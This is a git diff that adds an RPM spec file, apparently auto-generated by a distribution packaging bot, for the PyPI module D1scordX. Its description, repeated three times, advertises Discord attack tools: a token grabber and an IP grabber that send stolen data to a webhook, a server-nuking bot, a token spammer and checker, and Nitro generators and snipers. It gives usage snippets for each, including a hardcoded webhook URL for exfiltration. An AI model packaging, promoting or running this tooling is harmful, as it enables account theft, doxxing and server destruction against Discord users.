summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--.gitignore1
-rw-r--r--python-d1scordx.spec346
-rw-r--r--sources1
3 files changed, 348 insertions, 0 deletions
diff --git a/.gitignore b/.gitignore
index e69de29..2b4859e 100644
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1 @@
+/D1scordX-0.0.9.tar.gz
diff --git a/python-d1scordx.spec b/python-d1scordx.spec
new file mode 100644
index 0000000..d3d947a
--- /dev/null
+++ b/python-d1scordx.spec
@@ -0,0 +1,346 @@
+%global _empty_manifest_terminate_build 0
+Name: python-D1scordX
+Version: 0.0.9
+Release: 1
+Summary: D1scordX AIO Module
+License: MIT License
+URL: https://pypi.org/project/D1scordX/
+Source0: https://mirrors.aliyun.com/pypi/web/packages/f2/f9/65a8b5a94c549a93276ea7767ebb91de3919c538cbb0a3b9775972b53e0a/D1scordX-0.0.9.tar.gz
+BuildArch: noarch
+
+Requires: python3-requests
+Requires: python3-aiohttp
+Requires: python3-discord
+Requires: python3-unidecode
+Requires: python3-numpy
+Requires: python3-colorama
+Requires: python3-discord-webhooks
+
+%description
+<p align="center">
+ <b>Link:</b><br>
+ <a href="https://discord.gg/yBA7Wk67rH">Discord</a> |
+ <a href="https://www.youtube.com/c/XinGod">YouTube</a> |
+ <a href="https://github.com/XinOnGithub">Github</a>
+ <br>
+ <img src="https://cdn.discordapp.com/icons/791223032215240725/a_34b811424e1310fa438832dad9d113cf.gif">
+</p>
+<h1 align="center">Setup</h1>
+
+## Tips:
+- **Install module with**: ``pip install D1scordX``
+
+## Features:
+
+- CheckTokens | Check a token list from txt file and bypass ratelimit(discord api(not bypassing Cloudflare))
+- TokenGrabber | Grab discord token using webhook
+- IpGrabber | Grab ip and send to discord webhook
+- SelfNukeBot | Nuke discord server with your own account
+- TokenSpammer | Spam message with your **valid token**
+- GenerateNitro | Generate nitro and save on a txt file
+- NitroSniper | Snipe discord nitro
+
+## How to use:
+
+- **CheckTokens**
+```py
+from D1scordX import CheckTokens
+
+useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
+CheckTokens('filename.txt',useragent)
+
+#in filename.txt we have token(list)
+```
+
+- **TokenGrabber**
+```py
+from D1scordX import TokenGrabber
+
+webhook = 'https://discord.com/api/webhooks/826913797411045396/M1J0F8t7ngBLqWY1CEK3dDvCY4eN-YYLwhNkNKJj1MZKOKvwDViHgkqKGSa5TRjownWo'
+TokenGrabber(webhook)
+```
+
+- **SelfNukeBot**
+```py
+from D1scordX import SelfNukeBot
+
+token = 'token'
+prefix = 'bot prefix ex:$'
+SelfNukeBot(token,prefix)
+```
+
+- **TokenSpammer**
+```py
+from D1scordX import TokenSpammer
+
+TokenSpammer('my token file.txt',channel id (791225898242015255),message to send,10)
+ex:TokenSpammer('tokens.txt',791225898242015255,hello world,10)
+
+#in my token file.txt we have token(list)
+```
+
+- **GenerateNitro**
+```py
+from D1scordX import GenerateNitro
+
+GenerateNitro('outpout file.txt',count of nitro)
+ex:GenerateNitro('mynitro.txt',100)
+```
+
+```
+- **IpGrabber**
+```py
+from D1scordX import IpGrabber
+
+webhook = 'Your Webhhook Url'
+IpGrabber(webhook)
+```
+
+```
+
+- **NitroSniper**
+```py
+from D1scordX import NitroSniper
+
+token = 'your token'
+NitroSniper(token)
+```
+
+
+
+%package -n python3-D1scordX
+Summary: D1scordX AIO Module
+Provides: python-D1scordX
+BuildRequires: python3-devel
+BuildRequires: python3-setuptools
+BuildRequires: python3-pip
+%description -n python3-D1scordX
+<p align="center">
+ <b>Link:</b><br>
+ <a href="https://discord.gg/yBA7Wk67rH">Discord</a> |
+ <a href="https://www.youtube.com/c/XinGod">YouTube</a> |
+ <a href="https://github.com/XinOnGithub">Github</a>
+ <br>
+ <img src="https://cdn.discordapp.com/icons/791223032215240725/a_34b811424e1310fa438832dad9d113cf.gif">
+</p>
+<h1 align="center">Setup</h1>
+
+## Tips:
+- **Install module with**: ``pip install D1scordX``
+
+## Features:
+
+- CheckTokens | Check a token list from txt file and bypass ratelimit(discord api(not bypassing Cloudflare))
+- TokenGrabber | Grab discord token using webhook
+- IpGrabber | Grab ip and send to discord webhook
+- SelfNukeBot | Nuke discord server with your own account
+- TokenSpammer | Spam message with your **valid token**
+- GenerateNitro | Generate nitro and save on a txt file
+- NitroSniper | Snipe discord nitro
+
+## How to use:
+
+- **CheckTokens**
+```py
+from D1scordX import CheckTokens
+
+useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
+CheckTokens('filename.txt',useragent)
+
+#in filename.txt we have token(list)
+```
+
+- **TokenGrabber**
+```py
+from D1scordX import TokenGrabber
+
+webhook = 'https://discord.com/api/webhooks/826913797411045396/M1J0F8t7ngBLqWY1CEK3dDvCY4eN-YYLwhNkNKJj1MZKOKvwDViHgkqKGSa5TRjownWo'
+TokenGrabber(webhook)
+```
+
+- **SelfNukeBot**
+```py
+from D1scordX import SelfNukeBot
+
+token = 'token'
+prefix = 'bot prefix ex:$'
+SelfNukeBot(token,prefix)
+```
+
+- **TokenSpammer**
+```py
+from D1scordX import TokenSpammer
+
+TokenSpammer('my token file.txt',channel id (791225898242015255),message to send,10)
+ex:TokenSpammer('tokens.txt',791225898242015255,hello world,10)
+
+#in my token file.txt we have token(list)
+```
+
+- **GenerateNitro**
+```py
+from D1scordX import GenerateNitro
+
+GenerateNitro('outpout file.txt',count of nitro)
+ex:GenerateNitro('mynitro.txt',100)
+```
+
+```
+- **IpGrabber**
+```py
+from D1scordX import IpGrabber
+
+webhook = 'Your Webhhook Url'
+IpGrabber(webhook)
+```
+
+```
+
+- **NitroSniper**
+```py
+from D1scordX import NitroSniper
+
+token = 'your token'
+NitroSniper(token)
+```
+
+
+
+%package help
+Summary: Development documents and examples for D1scordX
+Provides: python3-D1scordX-doc
+%description help
+<p align="center">
+ <b>Link:</b><br>
+ <a href="https://discord.gg/yBA7Wk67rH">Discord</a> |
+ <a href="https://www.youtube.com/c/XinGod">YouTube</a> |
+ <a href="https://github.com/XinOnGithub">Github</a>
+ <br>
+ <img src="https://cdn.discordapp.com/icons/791223032215240725/a_34b811424e1310fa438832dad9d113cf.gif">
+</p>
+<h1 align="center">Setup</h1>
+
+## Tips:
+- **Install module with**: ``pip install D1scordX``
+
+## Features:
+
+- CheckTokens | Check a token list from txt file and bypass ratelimit(discord api(not bypassing Cloudflare))
+- TokenGrabber | Grab discord token using webhook
+- IpGrabber | Grab ip and send to discord webhook
+- SelfNukeBot | Nuke discord server with your own account
+- TokenSpammer | Spam message with your **valid token**
+- GenerateNitro | Generate nitro and save on a txt file
+- NitroSniper | Snipe discord nitro
+
+## How to use:
+
+- **CheckTokens**
+```py
+from D1scordX import CheckTokens
+
+useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
+CheckTokens('filename.txt',useragent)
+
+#in filename.txt we have token(list)
+```
+
+- **TokenGrabber**
+```py
+from D1scordX import TokenGrabber
+
+webhook = 'https://discord.com/api/webhooks/826913797411045396/M1J0F8t7ngBLqWY1CEK3dDvCY4eN-YYLwhNkNKJj1MZKOKvwDViHgkqKGSa5TRjownWo'
+TokenGrabber(webhook)
+```
+
+- **SelfNukeBot**
+```py
+from D1scordX import SelfNukeBot
+
+token = 'token'
+prefix = 'bot prefix ex:$'
+SelfNukeBot(token,prefix)
+```
+
+- **TokenSpammer**
+```py
+from D1scordX import TokenSpammer
+
+TokenSpammer('my token file.txt',channel id (791225898242015255),message to send,10)
+ex:TokenSpammer('tokens.txt',791225898242015255,hello world,10)
+
+#in my token file.txt we have token(list)
+```
+
+- **GenerateNitro**
+```py
+from D1scordX import GenerateNitro
+
+GenerateNitro('outpout file.txt',count of nitro)
+ex:GenerateNitro('mynitro.txt',100)
+```
+
+```
+- **IpGrabber**
+```py
+from D1scordX import IpGrabber
+
+webhook = 'Your Webhhook Url'
+IpGrabber(webhook)
+```
+
+```
+
+- **NitroSniper**
+```py
+from D1scordX import NitroSniper
+
+token = 'your token'
+NitroSniper(token)
+```
+
+
+
+%prep
+%autosetup -n D1scordX-0.0.9
+
+%build
+%py3_build
+
+%install
+%py3_install
+install -d -m755 %{buildroot}/%{_pkgdocdir}
+if [ -d doc ]; then cp -arf doc %{buildroot}/%{_pkgdocdir}; fi
+if [ -d docs ]; then cp -arf docs %{buildroot}/%{_pkgdocdir}; fi
+if [ -d example ]; then cp -arf example %{buildroot}/%{_pkgdocdir}; fi
+if [ -d examples ]; then cp -arf examples %{buildroot}/%{_pkgdocdir}; fi
+pushd %{buildroot}
+if [ -d usr/lib ]; then
+ find usr/lib -type f -printf "\"/%h/%f\"\n" >> filelist.lst
+fi
+if [ -d usr/lib64 ]; then
+ find usr/lib64 -type f -printf "\"/%h/%f\"\n" >> filelist.lst
+fi
+if [ -d usr/bin ]; then
+ find usr/bin -type f -printf "\"/%h/%f\"\n" >> filelist.lst
+fi
+if [ -d usr/sbin ]; then
+ find usr/sbin -type f -printf "\"/%h/%f\"\n" >> filelist.lst
+fi
+touch doclist.lst
+if [ -d usr/share/man ]; then
+ find usr/share/man -type f -printf "\"/%h/%f.gz\"\n" >> doclist.lst
+fi
+popd
+mv %{buildroot}/filelist.lst .
+mv %{buildroot}/doclist.lst .
+
+%files -n python3-D1scordX -f filelist.lst
+%dir %{python3_sitelib}/*
+
+%files help -f doclist.lst
+%{_docdir}/*
+
+%changelog
+* Tue Jun 20 2023 Python_Bot <Python_Bot@openeuler.org> - 0.0.9-1
+- Package Spec generated
diff --git a/sources b/sources
new file mode 100644
index 0000000..d31025b
--- /dev/null
+++ b/sources
@@ -0,0 +1 @@
+313c3debf8cb3852e6e9d01f9f584ba3 D1scordX-0.0.9.tar.gz